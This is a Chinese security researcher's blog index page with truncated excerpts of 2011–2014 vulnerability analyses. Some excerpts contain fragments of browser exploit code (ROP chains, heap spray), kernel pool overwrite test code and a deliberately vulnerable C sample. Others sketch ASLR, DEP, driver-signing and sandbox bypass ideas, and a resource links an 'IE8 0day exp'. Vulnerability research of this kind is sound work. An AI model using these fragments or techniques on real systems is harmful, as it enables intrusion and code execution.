自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

爱杀之爪的矩阵

我的青春是拿来奋斗的!

  • 博客(158)
  • 资源 (8)
  • 收藏
  • 关注

原创 ms10_046_shortcut_icon_dllloader 这个其实很好用

2014-04-08 23:34:21 3733 1

原创 MSVCRT:ROP - CN 修改ROP检测标志

function getddd() { var kkkkk = unescape("\u0433\u77bf"); kkkkk +=unescape("\u5ed5\u77be"); //xchg eax,esp retn kkkkk += unescape("\uf519\u77be")////pop ecx,retn kkkkk += unescape("\u9ef8\u1009

2014-04-08 23:21:34 2416

原创 openjdk windows 编译

前记 如果你不是闲着蛋疼最好不要在windows上面编译,linux上面一会就编译好了。。。。可是windows上面  只想说10个字“尼玛” 出现问题了  可以直接改他的makefile和gmk 爷爷的 例如那个verify.res 啥的 明明没有 他非要加入link 中,导致编译失败 感叹 人生太多的时间花费在这些虽然结果有用,但是过程无用的地方了

2013-04-22 13:45:26 5909 7

原创 Well-known DEP-violating thunks

这几天调试发现一个奇怪的现象,一个在数据区段执行的指令,在开启了系统dep时竟然还可以继续执行,换成其他指令就不可以,而且执行时这个内存属性仍旧是不可执行属性。同时按理指令是一条一条执行,但是这个指令的执行是跳跃了,瞬间差点毁了多年的指令执行三观。debugwin7+system dep openBreakpoint 0 hiteax=2e81e

2013-04-10 19:24:57 3562

原创 肉眼挖啊挖

蛋疼 待验证.text:1000C855 cycle_big: ; CODE XREF: sus_sub_1000C520+3D2j.text:1000C855 push 1.text:1000C857 mov ecx, ebx.text:1000

2013-04-04 11:54:40 1519 2

原创 权限提升

普通权限在不需要任何验证即启动了一个高级别权限的进程 本身就存在了很大的风险。权限存在交互 就很容易导致问题

2013-03-29 21:00:27 1246

原创 CVE-2013-0636

http://www.adobe.com/support/security/bulletins/apsb13-06.html

2013-02-18 12:20:48 1370

原创 当前多数杀软主防存在的缺陷

见 链接   http://www.binvul.com/viewthread.php?tid=240&extra=page%3D1

2012-12-03 23:18:22 991

原创 乱猜

http://bbs.360safe.com/thread-111959-1-1.htmliocode 0x222020 .text:000110C6 ; int __stdcall sub_110C6(int processid).text:000110C6 sub_110C6       proc near               ; CODE XREF:

2012-11-30 21:50:48 980

原创 WIN7-8 签名

http://linuxch.org/poc2012/MJ0011,Using%20a%20Patched%20Vulnerability%20to%20Bypass%20Windows%208%20x64%20Driver%20Signature%20Enforcement.pdf随便找个有漏洞的签名sys,然后在win8 win7下加载然后不就可以过签名了嘛比如

2012-11-14 10:07:09 1114

原创 ie 0day 分析

http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/

2012-09-23 17:31:54 1113

原创 cve-2012-1876 win7_ie8_leak_shellcode code

alert("begin")//var div_container = document.getElementById("test");//div_container.style.cssText = "display:none";var cloned = new Array();var selob = document.createElement("select");selob.w0

2012-08-08 12:55:06 2885

原创 cve2012-1876 leak mshtml base address and leak shellcode base address

leak mshtml base address leak shellcode base address其中leak shellcode base 思路是联合 http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003

2012-08-06 21:21:58 1342

原创 CVE2012-1723 Java Field Bytecode Verifier Cache RCE分析

漏洞分析http://www.binvul.com/viewthread.php?tid=134&extra=page%3D1

2012-07-25 21:10:20 1114

原创 chrome 插件的一处bug crash

https://code.google.com/p/chromium/issues/detail?id=127720&thanks=127720&ts=1336704072

2012-07-16 17:38:47 908

原创 cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞

引用http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/ 漏洞poc  漏洞原理: Applet有2个标签参数,codebase和code,c

2012-07-09 22:35:46 1283 1

原创 没有ASLR的几个DLL

DpoFeedb.dll        指纹识别 现在买的笔记本都有MSCOMCTL.OCX 需要用户点一次允许 之后就不需要了VBE7INTL.DLL    未找到加载方式迅雷                 mcvcr71.dlljava6                 mcvcr71.dllcomct232.ocx      需要用户点一次允许 之后就不需要了com

2012-06-22 15:49:13 1298

原创 失之交臂的 cve 2012-0181

1: kd> pwin32k!ReadLayoutFile+0x123:bf89edb7 7407            je      win32k!ReadLayoutFile+0x12c (bf89edc0)1: kd> pwin32k!ReadLayoutFile+0x125:bf89edb9 0fb703          movzx   eax,word ptr [

2012-06-22 15:45:04 1060

原创 cve2012-1889 ie8 rop

采用inking 大牛的方法function exploit(){obj = document.getElementById('oo').object;var src = unescape("%u0c0c%u0c0c");while (src.length < 0x1002) src += src;src = "\\\\xxx" + src;src = src.subs

2012-06-19 00:49:30 1204

原创 vm 快照快速分析堆类型漏洞

先选择一个虚拟机快照的分析开始点,这个点要把握好,堆的布局基本定了,不再改变然后直接运行poc,在崩溃地方,下这个断点Flash11e+0x5261c0:022> u Flash11e+0x5261cFlash11e+0x5261c:053c261c 8bb614050000    mov     esi,dword ptr +0x513 (00000514)[es

2012-06-06 22:35:18 1202

原创 HP_imc 5.1_E0202 imf.dll recv packets integer overflow

imf.dll版本 HP_iMC_PLAT_5.1_E0202_Standard_Windows_HP_iMC_PLAT_5.1_E0202_Standard_Windows漏洞汇编代码:.text:003B4083                 mov     ecx, [esi+38h].text:003B4086                 mov     eax, [ecx+eb

2012-05-20 20:51:43 951

原创 vul_sample

wchar_t * copy_data(wchar_t * string){ wchar_t *sep,*new1; int size=32 *sizeof(wchar_t); new1 =(wchar_t *)malloc(size); *new1='\0'; if (*string!='/') { wcscpy(new1,L"/"); size-=sizeof(wchar

2012-05-19 22:11:34 620 1

原创 java 漏洞调试科普

Java 漏洞调试科普Cve2010-0840 author : instruder 介绍以cve2010-0840的Java Runtime Environment Trusted Methods Chaining Remote CodeExecution Vulnerability漏洞为例,介绍下如何调试java漏洞。 这个漏洞影响的java版本 Jre

2012-05-09 14:02:51 1739 1

原创 cve 2010-0842 Oracle Java MixerSequencer Object GM_Song Structure Handling Vulnerability

cve 2010-0842Oracle Java MixerSequencer Object GM_Song Structure Handling Vulnerability 分析没啥难度这个…目的不在分析,呵呵 Instruderversion: jre 6u18  设置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT

2012-05-08 22:58:00 888 1

原创 HP 3COM/H3C Intelligent Management 几个 Luigi Auriemma发现的cve漏洞

这个 Luigi Auriemma 大牛 挖各种远程开端口软件的漏洞啊 ,牛叉...没事看下他挖的几个关于HP 3COM/H3C Intelligent Management 的漏洞 ,不用补丁对比,自己跟着看了一遍,当然了  是猜测 并不一定正确。CVE-2011-1851.text:0040AA05 loc_40AA05:

2012-04-25 11:18:33 1293 1

原创 Cve2012-0507 简单分析

Cve2012-0507分析 影响版本Jre update 30 before  触发漏洞代码 public class Exploit extends Applet{  publicvoid init()  {    try    {//manually constructing aserialized object      by

2012-04-17 14:40:51 1438

原创 一顿饭吃一两斤肉和一顿饭吃几百斤肉

明白了一样事情 一顿饭吃一两斤肉不能说明问题,但是一顿饭吃几百斤肉就能说明问题了 前者只是大众的水平,后者才是大师级的水平记次勉励!

2012-04-11 00:44:03 1425

原创 程序安装路径的潜在威胁

额 程序是不能安装在根目录的啊 千万啊例如python,直接安装在c盘根目录,尤其是服务器这样做,风险很大,很容易导致提权......最近在看一本书,据说是神书!we can do anything!

2012-04-03 10:39:57 586 3

原创 由 MS12-005 : 嵌入式对象任意代码执行引发的思考

http://blog.vulnhunt.com/index.php/2012/03/24/thinking_about-ms12-005/

2012-03-26 22:12:15 555

原创 ALLPlayerEN 5.0 ehtrace.dll dll hijack Vulnerability

/*Exploit Title: ALLPlayerEN 5.0 ehtrace.dll dll hijack VulnerabilityDate: 2012-3-25Author: instruderSoftware Link: http://www.allplayer.org/zh/download/allplayerVersion: ALLPlayerEN 5.0Teste

2012-03-26 22:09:34 559

原创 KERNEL POOL LIST ENTRY OVERWRITE ATTACK

KERNEL POOL LISTENTRY OVERWRITE ATTACK  LIST_ENTRY OVERWRITE 原理图 测试代码:Sys: VOID Nopagepool_ListEntry_Overwrite(ULONGcbin,ULONG cout,UCHAR * InputBuffer){ PVOIDpatdbuffer=NULL,p

2012-02-29 21:04:27 878

原创 创建个和System 名一样的进程

void proess_test(){printf("process_test\n");STARTUPINFO si;PROCESS_INFORMATION pi;WCHAR szCmdline[]={L"System."};ZeroMemory( &si, sizeof(si) );si.cb = sizeof(si);ZeroMemory( &pi, sizeo

2012-02-19 23:35:31 504

原创 CVE-2012-0759 Adobe Shockwave Player Director File Parsing KEY ATOM Pointer Overwrite

Discover: instruder of code audit labs of vulnhunt.comCAL: CAL-2011-0055CVE: CVE-2012-07591 Affected Products=================Test Version:Adobe Shockeave Player 11.6.3.633Adobe Shoc

2012-02-15 20:07:40 579

原创 CVE-2012-0758 Adobe Shockwave Player Parsing cupt atom heap overflow

Discover: instruder of code audit labs of vulnhunt.comCAL: CAL-2011-0071CVE: CVE-2012-07581 Affected Products=================adobe shockwave 11.6.3.633adobe Shockwave 11.6.1.629 and p

2012-02-15 20:06:09 666

原创 codeblocks ide for linux

我擦  经yourstar推荐 linux下的codeblocks果然是一个很好的ide 开发工具啊 之前写代码一直是用gtext,自己写makefile 那个纠结。。。。ubuntu下安装codeblockssudo apt-get install codeblocks 搞定。。跟vs2005的界面菜单啥的优点类似

2012-01-09 23:16:54 952

原创 看adobe sandbox的一点想法

adobe pdf的sandbox貌似是不会限制socket的,某技术paper上面说的这样感觉可以利用第三方程序的本地socket的漏洞来绕过sandbox。例如某某播放软件本地开了一个127.0.0.1的链接,存在溢出漏洞,这样假如你有了pdf的漏洞后,执行shellcode后,在和本地链接通信,从而再次溢出第三方程序,从而在第三方陈程序的进程空间执行任意代码,

2012-01-05 23:16:19 759 1

原创 漏洞分析----非常给力的方法----虚拟机快照

大家都知道在进行漏洞分析时,对于内存破坏或者其他很难定位类型的漏洞分析中,一个很难解决的就是数据的逆向溯源,等找到源头之后,大都就知道漏洞触发的原因了 可以用虚拟机快照来解决这个问题,发现无论是r3下面的漏洞分析还是内核的漏洞,都非常给力啊  在分析的开始,就保存一个虚拟机快照,每次重新分析时,就直接恢复快照,因为知道了 堆的地址,可以直接下堆的访问断点等,就算当前

2011-12-13 21:03:18 1183 3

原创 分析ms11-80 poc某些细节

NtQueryIntervalProfile函数是为了触发shellcode的执行eax=b25c9d14 ebx=80618501 ecx=00000000 edx=0021fb0c esi=00bcd968 edi=b25c9d64eip=80646d91 esp=b25c9d04 ebp=b25c9d20 iopl=0         nv up ei pl nz na pe nc

2011-12-01 22:14:44 1110

原创 A.Bug.Hunters.Diary.A.Guided.Tour.Through.the.Wilds.of.Software.Security 笔记

一 kernel 漏洞 的空指针引用 利用1. Trigger the NULL pointer dereference for a denial of service.2. Use the zero page to get control over EIP/RIP.第三章那个内核漏洞的利用真是经典啊二  开源系统的系统驱动漏洞查找  Step 1: List the

2011-11-24 09:17:00 706

原创 CVE-2011-2448 Adobe ShockwaveDirector File Parsing data of rcsl chunk multiple DOS vulnerabilities

Adobe Shockwave Player Director File Parsing data of rcsl chunk multiple DOS vulnerabilitiesCAL_ID: CAL-2011-0054CVE ID: CVE-2011-2448Discover: instruder of code audit labs of vulnhunt.comhttp

2011-11-09 20:29:01 469

Adobe_Reader_X_Sandbox

介绍adobe sandbox的

2012-01-05

程序分析工具].Zynamics.BinNavi.v4.0.4.

Zynamics.BinNaviZynamics.BinNaviZynamics.BinNaviZynamics.BinNaviZynamics.BinNaviZynamics.BinNaviZynamics.BinNaviZynamics.BinNaviZynamics.BinNavi

2011-11-04

ie80dayexp.

ie80dayexp.

2011-10-25

metasploit 中文使用 pdf encode

metasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encodemetasploit 中文使用 pdf encode

2011-10-20

豆丁下载器11111111111111

豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器豆丁下载器

2011-05-12

xuetr.sys驱动

XueTr是近年推出的一款广受好评的ARK工具。如果您对window系统不甚熟悉,您还是不要使用本工具,即使要使用,也不要用本工具胡乱操作。   作者:linxer   建议提供:包括angel13th、backway、dl123100、曲中求、tawny2008、wolfwalk888等。   最新版本:吾爱破解论坛专版   最近更新:2010年11月30日   支持系统:32位Windows2000 、xp、2003、Vista、2008、Win7操作系统,但不支持64位系统   名称:全称XueTr(类型:Anti Virus and Rookit Tools),简称XT。   更新:2008年12月发布于卡饭论坛,现已更新至0.37版本   由于XueTr已经具备基本需要功能,已经减少更新次数和频率。

2011-01-21

NT驱动安装文件.rar

NT驱动安装文件,包含工具,例子程序等,。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

2010-05-02

内核模式驱动程序汇编开发包

用于radasm开发驱动的,包括了用宏汇编编译器开发驱动程序需要用到的所有东西

2010-01-23

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除